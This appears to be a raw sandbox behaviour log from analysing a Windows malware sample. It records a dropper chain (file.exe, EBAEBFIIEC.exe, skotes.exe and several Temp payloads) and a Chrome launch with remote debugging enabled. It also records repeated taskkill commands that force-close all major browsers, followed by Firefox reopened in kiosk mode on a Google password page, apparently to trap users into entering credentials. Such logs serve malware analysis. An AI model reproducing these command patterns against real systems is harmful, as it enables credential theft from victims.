Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Documents\EBAEBFIIEC.exe "C:\Users\user\Documents\EBAEBFIIEC.exe"
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe "C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe "C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe "C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe "C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe "C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe"
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2288 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2140 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cbe96958-3f81-4a32-b212-5bd16e8524e8} 6768 "\\.\pipe\gecko-crash-server-pipe.6768" 2949c470510 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe "C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe "C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4024 -parentBuildID 20230927232528 -prefsHandle 4340 -prefMapHandle 4336 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {92ef462a-06cc-4d9b-9b96-d016683edb30} 6768 "\\.\pipe\gecko-crash-server-pipe.6768" 294ae474e10 rdd
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe "C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe"
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe "C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe"
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe "C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe"
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2284 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2224 -prefsLen 25416 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d7bd456a-bb2b-4481-8cf6-bd15856c7dab} 7188 "\\.\pipe\gecko-crash-server-pipe.7188" 1e153a6f910 socket
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\EBAEBFIIEC.exe" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1992,i,1316480559027049210,2605182806938244221,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Documents\EBAEBFIIEC.exe "C:\Users\user\Documents\EBAEBFIIEC.exe" Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe "C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe "C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe "C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe "C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe "C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2288 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2140 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cbe96958-3f81-4a32-b212-5bd16e8524e8} 6768 "\\.\pipe\gecko-crash-server-pipe.6768" 2949c470510 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4024 -parentBuildID 20230927232528 -prefsHandle 4340 -prefMapHandle 4336 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {92ef462a-06cc-4d9b-9b96-d016683edb30} 6768 "\\.\pipe\gecko-crash-server-pipe.6768" 294ae474e10 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2284 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2224 -prefsLen 25416 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d7bd456a-bb2b-4481-8cf6-bd15856c7dab} 7188 "\\.\pipe\gecko-crash-server-pipe.7188" 1e153a6f910 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
